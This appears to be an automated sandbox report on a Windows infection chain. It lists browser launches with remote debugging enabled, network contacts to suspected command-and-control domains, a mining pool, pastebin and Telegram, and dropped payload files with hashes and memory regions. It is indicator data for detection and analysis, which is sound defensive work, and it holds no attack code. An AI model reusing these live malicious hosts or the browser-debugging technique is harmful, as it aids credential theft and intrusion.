"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,1897738454572003785,11112025293879290616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3124 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,1897738454572003785,11112025293879290616,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3316 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,1897738454572003785,11112025293879290616,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,1897738454572003785,11112025293879290616,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2

Network

Country Destination Domain Proto
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
NL 45.144.212.77:16000 45.144.212.77 tcp
US 8.8.8.8:53 joyfulhezart.tech udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 172.67.212.102:443 codxefusion.top tcp
US 172.67.212.102:443 codxefusion.top tcp
US 172.67.212.102:443 codxefusion.top tcp
US 172.67.212.102:443 codxefusion.top tcp
US 172.67.212.102:443 codxefusion.top tcp
US 8.8.8.8:53 biochextryhub.bet udp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.212.102:443 codxefusion.top tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.212.102:443 codxefusion.top tcp
US 8.8.8.8:53 www.dropbox.com udp
GB 162.125.64.18:443 www.dropbox.com tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 104.21.9.123:443 moderzysics.top tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 104.21.9.123:443 moderzysics.top tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
DE 5.75.210.149:443 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 80.240.16.67:443 pool.hashvault.pro tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 ls.t.goldenloafuae.com udp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 e5.o.lencr.org udp
US 8.8.8.8:53 seizedsentec.online udp
GB 104.86.110.200:80 e5.o.lencr.org tcp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 172.67.220.226:443 farmingtzricks.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 172.67.220.226:443 farmingtzricks.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 172.67.220.226:443 farmingtzricks.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
CH 185.208.156.162:80 185.208.156.162 tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 172.217.169.74:443 ogads-pa.googleapis.com tcp
GB 216.58.201.110:443 apis.google.com tcp
GB 172.217.169.74:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
GB 142.250.200.14:443 play.google.com udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.180.14:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.169.65:443 clients2.googleusercontent.com tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
NL 45.154.98.175:6969 tcp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 explorebieology.run udp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.42.65.92:443 nw-umwatson.events.data.microsoft.com tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:9223 tcp
US 104.21.9.123:443 moderzysics.top tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.42.73.29:443 nw-umwatson.events.data.microsoft.com tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
US 20.42.73.29:443 nw-umwatson.events.data.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\mq8kQ9OnO.hta

MD5 24164c55359cb2be793b9f597bc5514b
SHA1 54dfb3694a5501202fc920de6994f55f69cc5e95
SHA256 70e92da33fb6877c1a07b51f1032d5251d4507c40d2682c734da363c18692b11
SHA512 c2093826d4e38803e79fc61bfd1fdc408a05b98cf9e17e4b890a9e44a7cd2d07a9d3b67d454ebe682ae2db597ff423f4f3e3cc8f8476524c184231d1c80860d8

memory/4824-2-0x0000000004880000-0x00000000048B6000-memory.dmp

memory/4824-3-0x00000000050A0000-0x00000000056C8000-memory.dmp

memory/4824-4-0x0000000004FA0000-0x0000000004FC2000-memory.dmp

memory/4824-5-0x0000000005740000-0x00000000057A6000-memory.dmp

memory/4824-6-0x0000000005820000-0x0000000005886000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qjyrybys.5av.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4824-16-0x0000000005990000-0x0000000005CE4000-memory.dmp

memory/4824-17-0x0000000005E10000-0x0000000005E2E000-memory.dmp

memory/4824-18-0x0000000005EC0000-0x0000000005F0C000-memory.dmp

memory/4824-19-0x0000000007550000-0x0000000007BCA000-memory.dmp

memory/4824-20-0x0000000006340000-0x000000000635A000-memory.dmp

memory/4824-22-0x00000000072F0000-0x0000000007386000-memory.dmp

memory/4824-23-0x0000000007250000-0x0000000007272000-memory.dmp

memory/4824-24-0x0000000008180000-0x0000000008724000-memory.dmp

C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE

MD5 b5db83c03a37b4cd4746a6080133e338
SHA1 edf3f7e5c3bda89e1382df8f7d0443783426c834
SHA256 8bf5d7ea5c499425488b94f13497a5c3b02997f00ec88fad1b577736fab245df
SHA512 e99da7c87f01dc7459b57d0ce3df799aeb22738840f047c56fb319dc8edddc00ae303ca02916b4b09690df3ff14d559fac44b3e627c6b24498338cfa290fc313

memory/2352-32-0x0000000000A60000-0x0000000000F1F000-memory.dmp

memory/628-48-0x0000000000E90000-0x000000000134F000-memory.dmp

memory/2352-46-0x0000000000A60000-0x0000000000F1F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe

MD5 2bb133c52b30e2b6b3608fdc5e7d7a22
SHA1 fcb19512b31d9ece1bbe637fe18f8caf257f0a00
SHA256 b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
SHA512 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

memory/628-63-0x0000000000E90000-0x000000000134F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe

MD5 5b3ed060facb9d57d8d0539084686870
SHA1 9cae8c44e44605d02902c29519ea4700b4906c76
SHA256 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
SHA512 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

C:\Users\Admin\AppData\Local\Temp\162.tmp\163.tmp\164.bat

MD5 3895cb9413357f87a88c047ae0d0bd40
SHA1 227404dd0f7d7d3ea9601eecd705effe052a6c91
SHA256 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785
SHA512 a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1

memory/3272-89-0x000001F3F8CF0000-0x000001F3F8D12000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b6d1564f25c6e55a3521e32f14b9359e
SHA1 f235ae0cf8b7dc38f0ba62f5af709db39721cfbb
SHA256 2d2e88eb22c7cbb32e7fab4b7ed51742f597b05b0a60796e8f2c3129952627c7
SHA512 b8ee3d1c7614afd16e3a653ec2433ccfa8f4c01600207b54040f32fb29ad670488c5988ed4430157496f2ccc29c2b1036491bddc707a531b185b65542b2d3d41

C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe

MD5 6006ae409307acc35ca6d0926b0f8685
SHA1 abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256 a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512 b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

memory/1572-104-0x0000000000D10000-0x00000000011AB000-memory.dmp

memory/628-106-0x0000000000E90000-0x000000000134F000-memory.dmp

memory/2848-108-0x0000000000E90000-0x000000000134F000-memory.dmp

memory/2848-109-0x0000000000E90000-0x000000000134F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe

MD5 641525fe17d5e9d483988eff400ad129
SHA1 8104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA256 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512 ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e

memory/2788-127-0x0000000000D30000-0x0000000000DA0000-memory.dmp

memory/1304-131-0x0000000003910000-0x0000000003915000-memory.dmp

memory/1304-132-0x0000000003910000-0x0000000003915000-memory.dmp

memory/2116-138-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2116-140-0x0000000000400000-0x0000000000466000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fb69a897da24ac74c2ae90ff3fc2ca23
SHA1 c682a0366ecd6631cad01cfe8f10e198da9a3e9a
SHA256 8ec36cc1e4ec619067e4781269afd4a68ba2490fb859eded484b731723c15661
SHA512 d2ee9b6843c726bc3c9ca807214177f1109f8354a4ed83e3f9577ebc223f260a5a6f7bbe71630f9b98c9f585fe7e6a216204aa7aa952967f4e0f59bd47fe599a

C:\Users\Admin\AppData\Local\Temp\installer.ps1

MD5 b6d611af4bea8eaaa639bbf024eb0e2d
SHA1 0b1205546fd80407d85c9bfbed5ff69d00645744
SHA256 8cd3bf95cedcf3469d0044976c66cbf22cd2fecf21ae4f94986d7211d6ba9a2b
SHA512 d8a4ec5bd986884959db3edfd48e2bf4c70ead436f81eab73b104aa0ff0f5dadfb6227cb2dab1f979f0dbb3aafbc1889ed571fb6e9444a09ae984b789314463d

memory/1572-157-0x0000000000D10000-0x00000000011AB000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\fvlm5rn1\fvlm5rn1.cmdline

MD5 00af5cb02e668eb208955d27c78d5541
SHA1 b86d0c24270ad2ac53c218c81575a39993fd4115
SHA256 d0e307dc7c64bb735cb924b381884df95cd500ee848a4451bdd30cf60e67f9d6
SHA512 c1b6b4b96616a7bbe2742583d9b3205cea5e27a105dd19578301e47085ee84c56db035f25841e1f49c6e790be059c20c41c423a6049c0e873ec462192f38d9c8

\??\c:\Users\Admin\AppData\Local\Temp\fvlm5rn1\fvlm5rn1.0.cs

MD5 1809fe3ba081f587330273428ec09c9c
SHA1 d24ea2ea868ae49f46c8a7d894b7fda255ec1cd9
SHA256 d07a0c5fdf0862325608791f92273e0fc411c294f94d757f1ff0303ba5e03457
SHA512 e662420fc93a5cefd657f7701432924e6a06482ea147ad814d5e20b16b2f3c13ed2cc6b9caf24c22b7a5b24ad0aa1d216c5804c46d2250522cfc2cadc69f9e28

\??\c:\Users\Admin\AppData\Local\Temp\fvlm5rn1\CSC1D221A13830145B39B7013BD391E7E61.TMP

MD5 7a7a4742cd355e964950d101ec2936fb
SHA1 81ac58d0f392c05616b7467260816a89f134aa7d
SHA256 0a6e1104c5cfad76194663187363df38fda97b83837f89885e62d2e3623e0b86
SHA512 1b3ad66412a64363c2696843c42943da95a2c281bc23ef7623c58a6b2779ecd0ad83f86ba1fc7594458a7f300e48a3f3c93659c037290aa6aeb2192ca530961d

C:\Users\Admin\AppData\Local\Temp\RES35B1.tmp

MD5 f81b6fc29eed33b7f9a66137a68bf76b
SHA1 9dfd8435032016ec6e053d507c973047905f504c
SHA256 93e2cd8bd1bbcff820e381b553568c18afc0902f4998a72abf42fcd0cd41f580
SHA512 ff8d588bb1ae8ef21444c537ebdefe616b877f04a38bcb331c8d08f57f6bbbf090781cf8557b08777982b933f43bb0728eabe4c54bd71e27eaa8de0876e8defe

C:\Users\Admin\AppData\Local\Temp\fvlm5rn1\fvlm5rn1.dll

MD5 7e2efb8916dc921e3aac19040933b9a0
SHA1 72bc068c9220fe66038db6c85a9e61ff2030dee9
SHA256 45ccd91e10d1e4748208bac7e0270e813ef7f2c0bf5d5f6c028ba484da1b2fba
SHA512 1c7cb1c02f7255403ad2b781a3814dcd44d4c4bf86bebfc868d520a627da34c3eb98048ca47d83326290f5fcdebb9ca17bdf5aed2117486e8d0928c1787cb405

memory/4940-170-0x0000022CC9570000-0x0000022CC9578000-memory.dmp

memory/3404-172-0x000000000D0B0000-0x000000000D933000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe

MD5 d39df45e0030e02f7e5035386244a523
SHA1 9ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256 df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA512 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

memory/4896-196-0x000001F6118B0000-0x000001F6118C2000-memory.dmp

memory/4896-197-0x000001F611C60000-0x000001F611C70000-memory.dmp

memory/2116-198-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2116-200-0x0000000003870000-0x0000000003875000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/4044-218-0x0000000000F00000-0x0000000000F60000-memory.dmp

memory/2012-223-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2012-220-0x0000000000400000-0x0000000000429000-memory.dmp

memory/628-224-0x0000000000E90000-0x000000000134F000-memory.dmp

memory/628-225-0x0000000000E90000-0x000000000134F000-memory.dmp

memory/1436-228-0x00007FF6B6C10000-0x00007FF6B74D4000-memory.dmp

memory/1436-229-0x00007FF6B6C10000-0x00007FF6B74D4000-memory.dmp

memory/1436-237-0x00007FF6B6C10000-0x00007FF6B74D4000-memory.dmp

memory/1436-238-0x00000255B31F0000-0x00000255B3210000-memory.dmp

memory/1436-240-0x00007FF6B6C10000-0x00007FF6B74D4000-memory.dmp

memory/1436-243-0x00007FF6B6C10000-0x00007FF6B74D4000-memory.dmp

memory/1436-241-0x00007FF6B6C10000-0x00007FF6B74D4000-memory.dmp

memory/1436-239-0x00007FF6B6C10000-0x00007FF6B74D4000-memory.dmp

memory/1436-242-0x00007FF6B6C10000-0x00007FF6B74D4000-memory.dmp

memory/4896-244-0x000001F62C1D0000-0x000001F62C6F8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe

MD5 9da08b49cdcc4a84b4a722d1006c2af8
SHA1 7b5af0630b89bd2a19ae32aea30343330ca3a9eb
SHA256 215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd
SHA512 579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e60635010b08caacd102600f0cbf7b8a
SHA1 426fc50efc506813fafe64ffac9409959e829ee7
SHA256 82625676e5cada386641eec46db64c792ef2391e699d6d739b37a24d71ed351a
SHA512 41bd62aaac472ad7820515de1c91a206bc3bce4ef341d198edf4de23be562dea15a72046ed972a8f335e0c50c47b88e1f97b78e9cbbb2400effbc62110cadb14

C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe

MD5 0eb68c59eac29b84f81ad6522d396f59
SHA1 aacfdf3cb1bdd995f63584f31526b11874fc76a5
SHA256 dfa74d5d729e90be6e72b3c811a1299abbc52a1f6d347f011101fb5f719d059f
SHA512 81ee88577d9b665d90bc846aa249c9533aaeed2b7259d15981fcc1686723fe11343b682be25cfa3542117c8a805e40343a7315a69e7204829cbf70f22cca25e7

C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\python312.dll

MD5 166cc2f997cba5fc011820e6b46e8ea7
SHA1 d6179213afea084f02566ea190202c752286ca1f
SHA256 c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546
SHA512 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb

C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ssl.pyd

MD5 90f080c53a2b7e23a5efd5fd3806f352
SHA1 e3b339533bc906688b4d885bdc29626fbb9df2fe
SHA256 fa5e6fe9545f83704f78316e27446a0026fbebb9c0c3c63faed73a12d89784d4
SHA512 4b9b8899052c1e34675985088d39fe7c95bfd1bbce6fd5cbac8b1e61eda2fbb253eef21f8a5362ea624e8b1696f1e46c366835025aabcb7aa66c1e6709aab58a

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libcrypto-3.dll

MD5 123ad0908c76ccba4789c084f7a6b8d0
SHA1 86de58289c8200ed8c1fc51d5f00e38e32c1aad5
SHA256 4e5d5d20d6d31e72ab341c81e97b89e514326c4c861b48638243bdf0918cfa43
SHA512 80fae0533ba9a2f5fa7806e86f0db8b6aab32620dde33b70a3596938b529f3822856de75bddb1b06721f8556ec139d784bc0bb9c8da0d391df2c20a80d33cb04

C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\vcruntime140_1.dll

MD5 f8dfa78045620cf8a732e67d1b1eb53d
SHA1 ff9a604d8c99405bfdbbf4295825d3fcbc792704
SHA256 a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5
SHA512 ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\_wmi.pyd

MD5 827615eee937880862e2f26548b91e83
SHA1 186346b816a9de1ba69e51042faf36f47d768b6c
SHA256 73b7ee3156ef63d6eb7df9900ef3d200a276df61a70d08bd96f5906c39a3ac32
SHA512 45114caf2b4a7678e6b1e64d84b118fb3437232b4c0add345ddb6fbda87cebd7b5adad11899bdcd95ddfe83fdc3944a93674ca3d1b5f643a2963fbe709e44fb8

C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\libssl-3.dll

MD5 4ff168aaa6a1d68e7957175c8513f3a2
SHA1 782f886709febc8c7cebcec4d92c66c4d5dbcf57
SHA256 2e4d35b681a172d3298caf7dc670451be7a8ba27c26446efc67470742497a950
SHA512 c372b759b8c7817f2cbb78eccc5a42fa80bdd8d549965bd925a97c3eebdce0335fbfec3995430064dead0f4db68ebb0134eb686a0be195630c49f84b468113e3

C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\select.pyd

MD5 7c14c7bc02e47d5c8158383cb7e14124
SHA1 5ee9e5968e7b5ce9e4c53a303dac9fc8faf98df3
SHA256 00bd8bb6dec8c291ec14c8ddfb2209d85f96db02c7a3c39903803384ff3a65e5
SHA512 af70cbdd882b923013cb47545633b1147ce45c547b8202d7555043cfa77c1deee8a51a2bc5f93db4e3b9cbf7818f625ca8e3b367bffc534e26d35f475351a77c

C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\_socket.pyd

MD5 69801d1a0809c52db984602ca2653541
SHA1 0f6e77086f049a7c12880829de051dcbe3d66764
SHA256 67aca001d36f2fce6d88dbf46863f60c0b291395b6777c22b642198f98184ba3
SHA512 5fce77dd567c046feb5a13baf55fdd8112798818d852dfecc752dac87680ce0b89edfbfbdab32404cf471b70453a33f33488d3104cd82f4e0b94290e83eae7bb

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_hashlib.pyd

MD5 a25bc2b21b555293554d7f611eaa75ea
SHA1 a0dfd4fcfae5b94d4471357f60569b0c18b30c17
SHA256 43acecdc00dd5f9a19b48ff251106c63c975c732b9a2a7b91714642f76be074d
SHA512 b39767c2757c65500fc4f4289cb3825333d43cb659e3b95af4347bd2a277a7f25d18359cedbdde9a020c7ab57b736548c739909867ce9de1dbd3f638f4737dc5

C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\_queue.pyd

MD5 e1c6ff3c48d1ca755fb8a2ba700243b2
SHA1 2f2d4c0f429b8a7144d65b179beab2d760396bfb
SHA256 0a6acfd24dfbaa777460c6d003f71af473d5415607807973a382512f77d075fa
SHA512 55bfd1a848f2a70a7a55626fb84086689f867a79f09726c825522d8530f4e83708eb7caa7f7869155d3ae48f3b6aa583b556f3971a2f3412626ae76680e83ca1

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_lzma.pyd

MD5 9e94fac072a14ca9ed3f20292169e5b2
SHA1 1eeac19715ea32a65641d82a380b9fa624e3cf0d
SHA256 a46189c5bd0302029847fed934f481835cb8d06470ea3d6b97ada7d325218a9f
SHA512 b7b3d0f737dd3b88794f75a8a6614c6fb6b1a64398c6330a52a2680caf7e558038470f6f3fc024ce691f6f51a852c05f7f431ac2687f4525683ff09132a0decb

C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\_bz2.pyd

MD5 30f396f8411274f15ac85b14b7b3cd3d
SHA1 d3921f39e193d89aa93c2677cbfb47bc1ede949c
SHA256 cb15d6cc7268d3a0bd17d9d9cec330a7c1768b1c911553045c73bc6920de987f
SHA512 7d997ef18e2cbc5bca20a4730129f69a6d19abdda0261b06ad28ad8a2bddcdecb12e126df9969539216f4f51467c0fe954e4776d842e7b373fe93a8246a5ca3f

C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\zstandard\backend_c.pyd

MD5 0fc69d380fadbd787403e03a1539a24a
SHA1 77f067f6d50f1ec97dfed6fae31a9b801632ef17
SHA256 641e0b0fa75764812fff544c174f7c4838b57f6272eaae246eb7c483a0a35afc
SHA512 e63e200baf817717bdcde53ad664296a448123ffd055d477050b8c7efcab8e4403d525ea3c8181a609c00313f7b390edbb754f0a9278232ade7cfb685270aaf0

memory/628-365-0x0000000000E90000-0x000000000134F000-memory.dmp

memory/1436-366-0x00007FF6B6C10000-0x00007FF6B74D4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe

MD5 f155a51c9042254e5e3d7734cd1c3ab0
SHA1 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA512 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

memory/2184-379-0x0000000000B00000-0x0000000000FA1000-memory.dmp

memory/2012-401-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2012-420-0x0000000000400000-0x0000000000429000-memory.dmp

